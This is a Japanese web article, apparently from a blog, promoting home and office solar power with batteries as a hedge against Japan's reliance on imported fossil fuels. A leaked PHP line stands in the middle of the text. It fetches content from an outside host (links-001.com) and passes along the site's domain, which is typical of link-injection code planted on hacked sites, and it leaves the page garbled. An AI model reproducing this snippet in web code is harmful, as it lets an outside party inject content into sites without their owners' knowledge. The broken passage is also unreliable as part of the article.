前へ
次へ

リスクマネジメントとして太陽光発電を導入

日本は島国であり、残念ながら資源にはあまり恵まれていません。
豊かな自然環境が比較的残されている先進国ではありますが、石油や石炭やガスや海洋資源は、ほとんど採掘出来ません。
社会のインフラを支えるためには、そういった資源が不可欠です。
日本は様々な資源を諸外国から輸入しています。
経済力を活用して、自国では採掘出来ない石炭や石油を大量に輸入する事で、社会インフラを維持しているのが実情です。
いわゆる資源大国と日本の国は、友好な関係を維持出来ています。
日本の経済力も、高度経済成長期やバブル期に比べて落ちたものの、石油や石炭などの輸入に充てる経済力は十分健在です。
直ちに資源の不足に悩まされる環境はありませんが、輸入に依存した社会は少しリスクがあります。
日本の食糧自給率の低さはしばしば問題視されています。
同時に発電に必要な化石燃料の自給率も低く、万が一想定外の事態が起きてしまい、諸外国からの安定供給がストップしたら、社会は混乱にします。
そういった事態が起きても、直ちに国内で大規模な停電が起きる事はありませんが、化石燃料の高騰や不足によって電気代が値上がりしたり、節電が求められる等、生活や企業活動への悪影響は避けられません。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

不足の事態に備えて、太陽光発電システムを自宅やオフィスに導入する人々が増えてきました。
万が一電気代が高騰したり、節電を求められる状況になっても、自前で電気を用意出来れば、普段どおりの企業活動や暮らしが出来ます。
一昔前は蓄電器の性能が今ほど良くなかったため、太陽光発電はリスクマネジメントに不向きだと言われました。
ところが最近はリーズナブルな価格でも、性能の良い蓄電池があり、普段から大量の電気を蓄えられます。
ソーラーパネルはランニングコストが安く、メンテナンスの費用も安価です。
製品によって寿命は変わりますが、技術革新によって今現在の物は20年から25年以上、安心して使い続けられます。
初期投資は必要ですが、短期間で費用は回収でき、万が一の事態にも対応出来るリスクマネジメント力が得られるので、安心したビジネスやライフスタイルを今後も維持したい方々は、デッドスペースを有効活用して太陽光発電の導入を進めましょう。

Page Top